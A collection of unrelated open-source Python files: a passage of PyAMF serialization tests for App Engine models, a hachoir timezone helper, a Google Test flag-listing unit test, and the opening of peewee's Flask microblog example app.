'\x00\x05title\x02\x00\x15Sense and Sensibility',
'\x00\x04_key' + amf0_k,
'\x00\x06author\x03', (
'\x00\x04name\x02\x00\x0bJane Austen',
'\x00\x04_key\x05'
),
'\x00\x00\t'
),
'\x00\x00\t')
self.assertEncodes(b, bytes, encoding=pyamf.AMF0)
bytes = (
'\n\x0b\x01', ((
'\rauthor\n\x0b\x01', (
'\t_key' + amf3_k,
'\tname\x06\x17Jane Austen'
), '\x01\x06\x01'),
'\x0btitle\x06+Sense and Sensibility'
),
'\x01')
self.assertEncodes(b, bytes, encoding=pyamf.AMF3)
# now test with aliases ..
pyamf.register_class(test_models.Author, 'Author')
pyamf.register_class(test_models.Novel, 'Novel')
bytes = (
'\x10\x00\x05Novel', (
'\x00\x05title\x02\x00\x15Sense and Sensibility',
'\x00\x04_key' + amf0_k,
'\x00\x06author\x10\x00\x06Author', (
'\x00\x04name\x02\x00\x0bJane Austen',
'\x00\x04_key\x05'
),
'\x00\x00\t'
),
'\x00\x00\t')
self.assertEncodes(b, bytes, encoding=pyamf.AMF0)
bytes = (
'\n\x0b\x0bNovel', ((
'\rauthor\n\x0b\rAuthor', (
'\t_key' + amf3_k,
'\tname\x06\x17Jane Austen'
), '\x01\n\x01'),
'\x0btitle\x06+Sense and Sensibility'
),
'\x01')
self.assertEncodes(b, bytes, encoding=pyamf.AMF3)
def test_expando(self):
class Author(db.Expando):
name = db.StringProperty()
class Novel(db.Expando):
title = db.StringProperty()
author = db.ReferenceProperty(Author)
a = Author(name='Jane Austen')
self.put(a)
k = str(a.key())
amf0_k = struct.pack('>H', len(k)) + k
amf3_k = amf3.encode_int(len(k) << 1 | amf3.REFERENCE_BIT) + k
b = Novel(title='Sense and Sensibility', author=a)
self.assertIdentical(b.author, a)
bytes = (
'\x03', (
'\x00\x05title\x02\x00\x15Sense and Sensibility',
'\x00\x04_key\x02' + amf0_k,
'\x00\x06author\x03', (
'\x00\x04name\x02\x00\x0bJane Austen',
'\x00\x04_key\x05'
),
'\x00\x00\t'
),
'\x00\x00\t')
self.assertEncodes(b, bytes, encoding=pyamf.AMF0)
bytes = (
'\n\x0b\x01', ((
'\rauthor\n\x0b\x01', (
'\t_key\x06' + amf3_k,
'\tname\x06\x17Jane Austen\x01'
), '\x02\x01'),
'\x0btitle\x06+Sense and Sensibility'
),
'\x01')
self.assertEncodes(b, bytes, encoding=pyamf.AMF3)
# now test with aliases ..
pyamf.register_class(Author, 'Author')
pyamf.register_class(Novel, 'Novel')
bytes = (
'\x10\x00\x05Novel', (
'\x00\x05title\x02\x00\x15Sense and Sensibility',
'\x00\x04_key\x02' + amf0_k,
'\x00\x06author\x10\x00\x06Author', (
'\x00\x04name\x02\x00\x0bJane Austen',
'\x00\x04_key\x05'
),
'\x00\x00\t'
),
'\x00\x00\t')
self.assertEncodes(b, bytes, encoding=pyamf.AMF0)
bytes = (
'\n\x0b\x0bNovel', ((
'\rauthor\n\x0b\rAuthor', (
'\t_key\x06' + amf3_k,
'\tname\x06\x17Jane Austen\x01'
), '\x06\x01'),
'\x0btitle\x06+Sense and Sensibility'
),
'\x01')
self.assertEncodes(b, bytes, encoding=pyamf.AMF3)
def test_dynamic_property_referenced_object(self):
a = test_models.Author(name='Jane Austen')
self.put(a)
b = test_models.Novel(title='Sense and Sensibility', author=a)
self.put(b)
x = db.get(b.key())
foo = [1, 2, 3]
x.author.bar = foo
ek = self.encodeKey(x, pyamf.AMF0)
el = self.encodeKey(a, pyamf.AMF0)
bytes = (
'\x03', (
'\x00\x05title\x02\x00\x15Sense and Sensibility',
'\x00\x04_key' + ek,
'\x00\x06author\x03', (
'\x00\x03bar\n\x00\x00\x00\x03\x00?\xf0\x00\x00\x00\x00'
'\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00@\x08\x00'
'\x00\x00\x00\x00\x00',
'\x00\x04name\x02\x00\x0bJane Austen',
'\x00\x04_key' + el
),
'\x00\x00\t'
),
'\x00\x00\t')
self.assertEncodes(x, bytes, encoding=pyamf.AMF0)
class ListPropertyTestCase(BaseTestCase):
"""
Tests for L{db.ListProperty} properties.
"""
def setUp(self):
BaseTestCase.setUp(self)
self.obj = test_models.ListModel()
self.obj.numbers = [2, 4, 6, 8, 10]
self.addCleanup(self.deleteEntity, self.obj)
def test_encode_amf0(self):
bytes = (
'\x03', (
'\x00\x04_key\x05',
'\x00\x07numbers\n\x00\x00\x00\x05\x00@'
'\x00\x00\x00\x00\x00\x00\x00\x00@\x10\x00\x00\x00\x00\x00'
'\x00\x00@\x18\x00\x00\x00\x00\x00\x00\x00@\x20\x00\x00\x00'
'\x00\x00\x00\x00@$\x00\x00\x00\x00\x00\x00'
),
'\x00\x00\t'
)
self.assertEncodes(self.obj, bytes, encoding=pyamf.AMF0)
def test_encode_amf3(self):
bytes = (
'\n\x0b\x01', (
'\t_key\x01',
'\x0fnumbers\t\x0b\x01\x04\x02\x04\x04\x04\x06\x04\x08\x04\n'
'\x01'
)
)
self.assertEncodes(self.obj, bytes, encoding=pyamf.AMF3)
def test_encode_amf0_registered(self):
pyamf.register_class(test_models.ListModel, 'list-model')
bytes = (
'\x10\x00\nlist-model', (
'\x00\x04_key\x05',
'\x00\x07numbers\n\x00\x00\x00\x05\x00@'
'\x00\x00\x00\x00\x00\x00\x00\x00@\x10\x00\x00\x00\x00\x00'
'\x00\x00@\x18\x00\x00\x00\x00\x00\x00\x00@\x20\x00\x00\x00'
'\x00\x00\x00\x00@$\x00\x00\x00\x00\x00\x00'
),
'\x00\x00\t'
)
self.assertEncodes(self.obj, bytes, encoding=pyamf.AMF0)
def test_encode_amf3_registered(self):
pyamf.register_class(test_models.ListModel, 'list-model')
bytes = (
'\n\x0b\x15list-model', (
'\t_key\x01',
'\x0fnumbers\t\x0b\x01\x04\x02\x04\x04\x04\x06\x04\x08\x04\n'
'\x01'
)
)
self.assertEncodes(self.obj, bytes, encoding=pyamf.AMF3)
def _check_list(self, x):
self.assertTrue(isinstance(x, test_models.ListModel))
self.assertTrue(hasattr(x, 'numbers'))
self.assertEqual(x.numbers, [2, 4, 6, 8, 10])
def test_decode_amf0(self):
pyamf.register_class(test_models.ListModel, 'list-model')
bytes = (
'\x10\x00\nlist-model\x00\x07numbers\n\x00\x00\x00\x05\x00@\x00'
'\x00\x00\x00\x00\x00\x00\x00@\x10\x00\x00\x00\x00\x00\x00\x00@'
'\x18\x00\x00\x00\x00\x00\x00\x00@ \x00\x00\x00\x00\x00\x00\x00@'
'$\x00\x00\x00\x00\x00\x00\x00\x00\t')
x = self.decode(bytes, encoding=pyamf.AMF0)
self._check_list(x)
def test_decode_amf3(self):
pyamf.register_class(test_models.ListModel, 'list-model')
bytes = (
'\n\x0b\x15list-model\x0fnumbers\t\x0b\x01\x04\x02\x04\x04\x04'
'\x06\x04\x08\x04\n\x01')
x = self.decode(bytes, encoding=pyamf.AMF3)
self._check_list(x)
def test_none(self):
pyamf.register_class(test_models.ListModel, 'list-model')
bytes = '\x10\x00\nlist-model\x00\x07numbers\x05\x00\x00\t'
x = self.decode(bytes, encoding=pyamf.AMF0)
self.assertEqual(x.numbers, [])
class DecodingModelTestCase(BaseTestCase):
"""
"""
def getModel(self):
return test_models.PetModel
def setUp(self):
BaseTestCase.setUp(self)
self.model_class = self.getModel()
self.jessica = JessicaFactory.makeJessica(self.model_class)
pyamf.register_class(self.model_class, 'Pet')
self.put(self.jessica)
self.key = str(self.jessica.key())
def _check_model(self, x):
self.assertTrue(isinstance(x, self.model_class))
self.assertEqual(x.__class__, self.model_class)
self.assertEqual(x.type, self.jessica.type)
self.assertEqual(x.weight_in_pounds, self.jessica.weight_in_pounds)
self.assertEqual(x.birthdate, self.jessica.birthdate)
self.assertEqual(x.spayed_or_neutered, self.jessica.spayed_or_neutered)
# now check db.Model internals
self.assertEqual(x.key(), self.jessica.key())
self.assertEqual(x.kind(), self.jessica.kind())
self.assertEqual(x.parent(), self.jessica.parent())
self.assertEqual(x.parent_key(), self.jessica.parent_key())
self.assertTrue(x.is_saved())
def test_amf0(self):
bytes = (
'\x10\x00\x03Pet\x00\x04_key%s\x00\x04type\x02\x00\x03cat'
'\x00\x10weight_in_pounds\x00@\x14\x00\x00\x00\x00\x00\x00\x00'
'\x04name\x02\x00\x07Jessica\x00\tbirthdate\x0bB^\xc4\xae\xaa\x00'
'\x00\x00\x00\x00\x00\x12spayed_or_neutered\x01\x00\x00\x00\t' % (
self.encodeKey(self.key, pyamf.AMF0),))
x = self.decode(bytes, encoding=pyamf.AMF0)
self._check_model(x)
def test_amf3(self):
bytes = (
'\n\x0b\x07Pet\tname\x06\x0fJessica\t_key%s\x13birthdate'
'\x08\x01B^\xc4\xae\xaa\x00\x00\x00!weight_in_pounds\x04\x05\x07'
'foo\x06\x07bar\ttype\x06\x07cat%%spayed_or_neutered\x02\x01' % (
self.encodeKey(self.key, pyamf.AMF3),))
x = self.decode(bytes, encoding=pyamf.AMF3)
self._check_model(x)
class DecodingExpandoTestCase(DecodingModelTestCase):
"""
"""
def getModel(self):
return test_models.PetExpando
class ClassAliasTestCase(BaseTestCase):
"""
"""
def setUp(self):
BaseTestCase.setUp(self)
self.alias = adapter_db.DataStoreClassAlias(test_models.PetModel, 'foo.bar')
self.jessica = test_models.PetModel(name='Jessica', type='cat')
self.jessica_expando = test_models.PetExpando(name='Jessica', type='cat')
self.jessica_expando.foo = 'bar'
self.addCleanup(self.deleteEntity, self.jessica)
self.addCleanup(self.deleteEntity, self.jessica_expando)
def test_get_alias(self):
alias = pyamf.register_class(test_models.PetModel)
self.assertTrue(isinstance(alias, adapter_db.DataStoreClassAlias))
def test_alias(self):
self.alias.compile()
self.assertEqual(self.alias.decodable_properties, [
'birthdate',
'name',
'spayed_or_neutered',
'type',
'weight_in_pounds'
])
self.assertEqual(self.alias.encodable_properties, [
'birthdate',
'name',
'spayed_or_neutered',
'type',
'weight_in_pounds'
])
self.assertEqual(self.alias.static_attrs, [])
self.assertEqual(self.alias.readonly_attrs, None)
self.assertEqual(self.alias.exclude_attrs, None)
self.assertEqual(self.alias.reference_properties, None)
def test_create_instance(self):
x = self.alias.createInstance()
self.assertTrue(isinstance(x, adapter_db.ModelStub))
self.assertTrue(hasattr(x, 'klass'))
self.assertEqual(x.klass, self.alias.klass)
# test some stub functions
self.assertEqual(x.properties(), self.alias.klass.properties())
self.assertEqual(x.dynamic_properties(), [])
def test_apply(self):
x = self.alias.createInstance()
self.assertTrue(hasattr(x, 'klass'))
self.alias.applyAttributes(x, {
adapter_db.DataStoreClassAlias.KEY_ATTR: None,
'name': 'Jessica',
'type': 'cat',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None
})
self.assertFalse(hasattr(x, 'klass'))
def test_get_attrs(self):
attrs = self.alias.getEncodableAttributes(self.jessica)
self.assertEqual(attrs, {
'_key': None,
'type': 'cat',
'name': 'Jessica',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None
})
def test_get_attrs_expando(self):
attrs = self.alias.getEncodableAttributes(self.jessica_expando)
self.assertEqual(attrs, {
'_key': None,
'type': 'cat',
'name': 'Jessica',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None,
'foo': 'bar'
})
def test_get_attributes(self):
attrs = self.alias.getEncodableAttributes(self.jessica)
self.assertEqual(attrs, {
'_key': None,
'type': 'cat',
'name': 'Jessica',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None
})
def test_get_attributes_saved(self):
self.put(self.jessica)
attrs = self.alias.getEncodableAttributes(self.jessica)
self.assertEqual(attrs, {
'name': 'Jessica',
'_key': str(self.jessica.key()),
'type': 'cat',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None
})
def test_get_attributes_expando(self):
attrs = self.alias.getEncodableAttributes(self.jessica_expando)
self.assertEqual(attrs, {
'name': 'Jessica',
'_key': None,
'type': 'cat',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None,
'foo': 'bar'
})
def test_get_attributes_saved_expando(self):
self.put(self.jessica_expando)
attrs = self.alias.getEncodableAttributes(self.jessica_expando)
self.assertEqual(attrs, {
'name': 'Jessica',
'_key': str(self.jessica_expando.key()),
'type': 'cat',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None,
'foo': 'bar'
})
def test_arbitrary_properties(self):
self.jessica.foo = 'bar'
attrs = self.alias.getEncodableAttributes(self.jessica)
self.assertEqual(attrs, {
'_key': None,
'type': 'cat',
'name': 'Jessica',
'birthdate': None,
'weight_in_pounds': None,
'spayed_or_neutered': None,
'foo': 'bar'
})
def test_property_type(self):
class PropertyTypeModel(db.Model):
@property
def readonly(self):
return True
def _get_prop(self):
return False
def _set_prop(self, v):
self.prop = v
read_write = property(_get_prop, _set_prop)
alias = adapter_db.DataStoreClassAlias(PropertyTypeModel, 'foo.bar')
obj = PropertyTypeModel()
attrs = alias.getEncodableAttributes(obj)
self.assertEqual(attrs, {
'_key': None,
'read_write': False,
'readonly': True
})
self.assertFalse(hasattr(obj, 'prop'))
alias.applyAttributes(obj, {
'_key': None,
'readonly': False,
'read_write': 'foo'
})
self.assertEqual(obj.prop, 'foo')
class ReferencesTestCase(BaseTestCase):
"""
"""
def setUp(self):
BaseTestCase.setUp(self)
self.jessica = test_models.PetModel(name='Jessica', type='cat')
self.jessica.birthdate = datetime.date(1986, 10, 2)
self.jessica.weight_in_pounds = 5
self.jessica.spayed_or_neutered = False
self.put(self.jessica)
self.jessica2 = db.get(self.jessica.key())
self.assertNotIdentical(self.jessica,self.jessica2)
self.assertEqual(str(self.jessica.key()), str(self.jessica2.key()))
def failOnGet(self, *args, **kwargs):
self.fail('Get attempted %r, %r' % (args, kwargs))
def test_amf0(self):
encoder = pyamf.get_encoder(pyamf.AMF0)
stream = encoder.stream
encoder.writeElement(self.jessica)
stream.truncate()
encoder.writeElement(self.jessica2)
self.assertEqual(stream.getvalue(), '\x07\x00\x00')
def test_amf3(self):
encoder = pyamf.get_encoder(pyamf.AMF3)
stream = encoder.stream
encoder.writeElement(self.jessica)
stream.truncate()
encoder.writeElement(self.jessica2)
self.assertEqual(stream.getvalue(), '\n\x00')
def test_nullreference(self):
c = test_models.Novel(title='Pride and Prejudice', author=None)
self.put(c)
encoder = pyamf.get_encoder(encoding=pyamf.AMF3)
alias = adapter_db.DataStoreClassAlias(test_models.Novel, None)
attrs = alias.getEncodableAttributes(c, codec=encoder)
self.assertEqual(attrs, {
'_key': str(c.key()),
'title': 'Pride and Prejudice',
'author': None
})
class GAEReferenceCollectionTestCase(BaseTestCase):
"""
"""
def setUp(self):
BaseTestCase.setUp(self)
self.klass = adapter_db.GAEReferenceCollection
def test_init(self):
x = self.klass()
self.assertEqual(x, {})
def test_get(self):
x = self.klass()
# not a class type
self.assertRaises(TypeError, x.getClassKey, chr, '')
# not a subclass of db.Model/db.Expando
self.assertRaises(TypeError, x.getClassKey, Spam, '')
x = self.klass()
self.assertRaises(KeyError, x.getClassKey, test_models.PetModel, 'foo')
self.assertEqual(x, {test_models.PetModel: {}})
obj = object()
x[test_models.PetModel]['foo'] = obj
obj2 = x.getClassKey(test_models.PetModel, 'foo')
self.assertEqual(id(obj), id(obj2))
self.assertEqual(x, {test_models.PetModel: {'foo': obj}})
def test_add(self):
x = self.klass()
# not a class type
self.assertRaises(TypeError, x.addClassKey, chr, '')
# not a subclass of db.Model/db.Expando
self.assertRaises(TypeError, x.addClassKey, Spam, '')
# wrong type for key
self.assertRaises(TypeError, x.addClassKey, test_models.PetModel, 3)
x = self.klass()
pm1 = test_models.PetModel(type='cat', name='Jessica')
pm2 = test_models.PetModel(type='dog', name='Sam')
pe1 = test_models.PetExpando(type='cat', name='Toby')
self.assertEqual(x, {})
x.addClassKey(test_models.PetModel, 'foo', pm1)
self.assertEqual(x, {test_models.PetModel: {'foo': pm1}})
x.addClassKey(test_models.PetModel, 'bar', pm2)
self.assertEqual(x, {test_models.PetModel: {'foo': pm1, 'bar': pm2}})
x.addClassKey(test_models.PetExpando, 'baz', pe1)
self.assertEqual(x, {
test_models.PetModel: {'foo': pm1, 'bar': pm2},
test_models.PetExpando: {'baz': pe1}
})
class HelperTestCase(BaseTestCase):
"""
"""
def test_getGAEObjects(self):
context = Spam()
context.extra = {}
x = adapter_db.getGAEObjects(context)
self.assertTrue(isinstance(x, adapter_db.GAEReferenceCollection))
self.assertTrue('gae_objects' in context.extra)
self.assertEqual(id(x), id(context.extra['gae_objects']))
def test_Query_type(self):
"""
L{db.Query} instances get converted to lists ..
"""
q = test_models.EmptyModel.all()
self.assertTrue(isinstance(q, db.Query))
self.assertEncodes(q, '\n\x00\x00\x00\x00', encoding=pyamf.AMF0)
self.assertEncodes(q, '\t\x01\x01', encoding=pyamf.AMF3)
class FloatPropertyTestCase(BaseTestCase):
"""
Tests for #609.
"""
def setUp(self):
BaseTestCase.setUp(self)
class FloatModel(db.Model):
f = db.FloatProperty()
self.klass = FloatModel
self.f = FloatModel()
self.alias = adapter_db.DataStoreClassAlias(self.klass, None)
def tearDown(self):
BaseTestCase.tearDown(self)
if self.f.is_saved():
self.f.delete()
def test_behaviour(self):
"""
Test the behaviour of the Google SDK not handling ints gracefully
"""
self.assertRaises(db.BadValueError, setattr, self.f, 'f', 3)
self.f.f = 3.0
self.assertEqual(self.f.f, 3.0)
def test_apply_attributes(self):
self.alias.applyAttributes(self.f, {'f': 3})
self.assertEqual(self.f.f, 3.0)
class PolyModelTestCase(BaseTestCase):
"""
Tests for L{db.PolyModel}. See #633
"""
def setUp(self):
BaseTestCase.setUp(self)
class Poly(polymodel.PolyModel):
s = db.StringProperty()
self.klass = Poly
self.p = Poly()
self.alias = adapter_db.DataStoreClassAlias(self.klass, None)
def test_encode(self):
self.p.s = 'foo'
attrs = self.alias.getEncodableAttributes(self.p)
self.assertEqual(attrs, {'_key': None, 's': 'foo'})
def test_deep_inheritance(self):
class DeepPoly(self.klass):
d = db.IntegerProperty()
self.alias = adapter_db.DataStoreClassAlias(DeepPoly, None)
self.dp = DeepPoly()
self.dp.s = 'bar'
self.dp.d = 92
attrs = self.alias.getEncodableAttributes(self.dp)
self.assertEqual(attrs, {
'_key': None,
's': 'bar',
'd': 92
})
class BlobStoreTestCase(BaseTestCase):
"""
Tests for L{blobstore}
"""
bytes = (
'\n\x0bOgoogle.appengine.ext.blobstore.BlobInfo', (
'\tsize\x04\xcb\xad\x07',
'\x11creation\x08\x01Br\x9c\x1d\xbeh\x80\x00',
'\x07key\x06\rfoobar',
'\x19content_type\x06\x15text/plain',
'\x11filename\x06\x1fnot-telling.ogg'
), '\x01')
values = {
'content_type': 'text/plain',
'size': 1234567,
'filename': 'not-telling.ogg',
'creation': datetime.datetime(2010, 07, 11, 14, 15, 01)
}
def setUp(self):
BaseTestCase.setUp(self)
self.key = blobstore.BlobKey('foobar')
self.info = blobstore.BlobInfo(self.key, self.values)
def test_class_alias(self):
alias_klass = pyamf.get_class_alias(blobstore.BlobInfo)
self.assertIdentical(alias_klass.__class__, adapter_blobstore.BlobInfoClassAlias)
def test_encode(self):
self.assertEncodes(self.info, self.bytes)
def test_decode(self):
def check(ret):
self.assertEqual(ret.key(), self.key)
self.assertDecodes(self.bytes, check)
|
nopjmp/SickRage
|
refs/heads/master
|
lib/hachoir_metadata/timezone.py
|
185
|
from datetime import tzinfo, timedelta
class TimezoneUTC(tzinfo):
"""UTC timezone"""
ZERO = timedelta(0)
def utcoffset(self, dt):
return TimezoneUTC.ZERO
def tzname(self, dt):
return u"UTC"
def dst(self, dt):
return TimezoneUTC.ZERO
def __repr__(self):
return "<TimezoneUTC delta=0, name=u'UTC'>"
class Timezone(TimezoneUTC):
"""Fixed offset in hour from UTC."""
def __init__(self, offset):
self._offset = timedelta(minutes=offset*60)
self._name = u"%+03u00" % offset
def utcoffset(self, dt):
return self._offset
def tzname(self, dt):
return self._name
def __repr__(self):
return "<Timezone delta=%s, name='%s'>" % (
self._offset, self._name)
UTC = TimezoneUTC()
def createTimezone(offset):
if offset:
return Timezone(offset)
else:
return UTC
|
phantasien/falkor
|
refs/heads/master
|
deps/bastian/deps/gtest/test/gtest_list_tests_unittest.py
|
1898
|
#!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test's --gtest_list_tests flag.
A user can ask Google Test to list all tests by specifying the
--gtest_list_tests flag. This script tests such functionality
by invoking gtest_list_tests_unittest_ (a program written with
Google Test) the command line flags.
"""
__author__ = 'phanna@google.com (Patrick Hanna)'
import gtest_test_utils
import re
# Constants.
# The command line flag for enabling/disabling listing all tests.
LIST_TESTS_FLAG = 'gtest_list_tests'
# Path to the gtest_list_tests_unittest_ program.
EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_')
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests
EXPECTED_OUTPUT_NO_FILTER_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
Abc\.
Xyz
Def
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
TypedTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
TypedTest/1\. # TypeParam = int\s*\*
TestA
TestB
TypedTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
My/TypeParamTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
My/TypeParamTest/1\. # TypeParam = int\s*\*
TestA
TestB
My/TypeParamTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
MyInstantiation/ValueParamTest\.
TestA/0 # GetParam\(\) = one line
TestA/1 # GetParam\(\) = two\\nlines
TestA/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
TestB/0 # GetParam\(\) = one line
TestB/1 # GetParam\(\) = two\\nlines
TestB/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
""")
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests and --gtest_filter=Foo*.
EXPECTED_OUTPUT_FILTER_FOO_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
""")
# Utilities.
def Run(args):
"""Runs gtest_list_tests_unittest_ and returns the list of tests printed."""
return gtest_test_utils.Subprocess([EXE_PATH] + args,
capture_stderr=False).output
# The unit test.
class GTestListTestsUnitTest(gtest_test_utils.TestCase):
"""Tests using the --gtest_list_tests flag to list all tests."""
def RunAndVerify(self, flag_value, expected_output_re, other_flag):
"""Runs gtest_list_tests_unittest_ and verifies that it prints
the correct tests.
Args:
flag_value: value of the --gtest_list_tests flag;
None if the flag should not be present.
expected_output_re: regular expression that matches the expected
output after running command;
other_flag: a different flag to be passed to command
along with gtest_list_tests;
None if the flag should not be present.
"""
if flag_value is None:
flag = ''
flag_expression = 'not set'
elif flag_value == '0':
flag = '--%s=0' % LIST_TESTS_FLAG
flag_expression = '0'
else:
flag = '--%s' % LIST_TESTS_FLAG
flag_expression = '1'
args = [flag]
if other_flag is not None:
args += [other_flag]
output = Run(args)
if expected_output_re:
self.assert_(
expected_output_re.match(output),
('when %s is %s, the output of "%s" is "%s",\n'
'which does not match regex "%s"' %
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output,
expected_output_re.pattern)))
else:
self.assert_(
not EXPECTED_OUTPUT_NO_FILTER_RE.match(output),
('when %s is %s, the output of "%s" is "%s"'%
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output)))
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(flag_value=None,
expected_output_re=None,
other_flag=None)
def testFlag(self):
"""Tests using the --gtest_list_tests flag."""
self.RunAndVerify(flag_value='0',
expected_output_re=None,
other_flag=None)
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag=None)
def testOverrideNonFilterFlags(self):
"""Tests that --gtest_list_tests overrides the non-filter flags."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag='--gtest_break_on_failure')
def testWithFilterFlags(self):
"""Tests that --gtest_list_tests takes into account the
--gtest_filter flag."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_FILTER_FOO_RE,
other_flag='--gtest_filter=Foo*')
if __name__ == '__main__':
gtest_test_utils.Main()
|
coleifer/peewee
|
refs/heads/master
|
examples/twitter/app.py
|
1
|
import datetime
from flask import Flask
from flask import g
from flask import redirect
from flask import request
from flask import session
from flask import url_for, abort, render_template, flash
from functools import wraps
from hashlib import md5
from peewee import *
# config - aside from our database, the rest is for use by Flask
DATABASE = 'tweepee.db'
DEBUG = True
SECRET_KEY = 'hin6bab8ge25*r=x&+5$0kn=-#log$pt^#@vrqjld!^2ci@g*b'
# create a flask application - this ``app`` object will be used to handle
# inbound requests, routing them to the proper 'view' functions, etc
app = Flask(__name__)
app.config.from_object(__name__)
# create a peewee database instance -- our models will use this database to
# persist information
database = SqliteDatabase(DATABASE)
# model definitions -- the standard "pattern" is to define a base model class
# that specifies which database to use. then, any subclasses will automatically
# use the correct storage. for more information, see:
# https://charlesleifer.com/docs/peewee/peewee/models.html#model-api-smells-like-django
class BaseModel(Model):
class Meta:
database = database
# the user model specifies its fields (or columns) declaratively, like django
class User(BaseModel):
username = CharField(unique=True)
password = CharField()
email = CharField()
join_date = DateTimeField()
# it often makes sense to put convenience methods on model instances, for
# example, "give me all the users this user is following":
def following(self):
# query other users through the "relationship" table
return (User
.select()
.join(Relationship, on=Relationship.to_user)
.where(Relationship.from_user == self)
.order_by(User.username))
def followers(self):
return (User
.select()
.join(Relationship, on=Relationship.from_user)
.where(Relationship.to_user == self)
.order_by(User.username))
def is_following(self, user):
return (Relationship
.select()
.where(
(Relationship.from_user == self) &
(Relationship.to_user == user))
.exists())
def gravatar_url(self, size=80):
return 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \
(md5(self.email.strip().lower().encode('utf-8')).hexdigest(), size)
# this model contains two foreign keys to user -- it essentially allows us to
# model a "many-to-many" relationship between users. by querying and joining
# on different columns we can expose who a user is "related to" and who is
# "related to" a given user
class Relationship(BaseModel):
from_user = ForeignKeyField(User, backref='relationships')
to_user = ForeignKeyField(User, backref='related_to')
class Meta:
indexes = (
# Specify a unique multi-column index on from/to-user.
(('from_user', 'to_user'), True),
)
# a dead simple one-to-many relationship: one user has 0..n messages, exposed by
# the foreign key. because we didn't specify, a users messages will be accessible
# as a special attribute, User.message_set
class Message(BaseModel):
user = ForeignKeyField(User, backref='messages')
content = TextField()
pub_date = DateTimeField()
# simple utility function to create tables
def create_tables():
with database:
database.create_tables([User, Relationship, Message])
# flask provides a "session" object, which allows us to store information across
# requests (stored by default in a secure cookie). this function allows us to
# mark a user as being logged-in by setting some values in the session data:
def auth_user(user):
session['logged_in'] = True
session['user_id'] = user.id
session['username'] = user.username
flash('You are logged in as %s' % (user.username))
# get the user from the session
def get_current_user():
if session.get('logged_in'):
return User.get(User.id == session['user_id'])
# view decorator which indicates that the requesting user must be authenticated
# before they can access the view. it checks the session to see if they're
# logged in, and if not redirects them to the login view.
def login_required(f):
@wraps(f)
def inner(*args, **kwargs):
if not session.get('logged_in'):
return redirect(url_for('login'))
return f(*args, **kwargs)
return inner
# given a template and a SelectQuery instance, render a paginated list of
# objects from the query inside the template
def object_list(template_name, qr, var_name='object_list', **kwargs):
kwargs.update(
page=int(request.args.get('page', 1)),
pages=qr.count() / 20 + 1)
kwargs[var_name] = qr.paginate(kwargs['page'])
return render_template(template_name, **kwargs)
# retrieve a single object matching the specified query or 404 -- this uses the
# shortcut "get" method on model, which retrieves a single object or raises a
# DoesNotExist exception if no matching object exists
# https://charlesleifer.com/docs/peewee/peewee/models.html#Model.get)
def get_object_or_404(model, *expressions):
try:
return model.get(*expressions)
except model.DoesNotExist:
abort(404)
# custom template filter -- flask allows you to define these functions and then
# they are accessible in the template -- this one returns a boolean whether the
# given user is following another user.
@app.template_filter('is_following')
def is_following(from_user, to_user):
return from_user.is_following(to_user)
# Request handlers -- these two hooks are provided by flask and we will use them
# to create and tear down a database connection on each request.
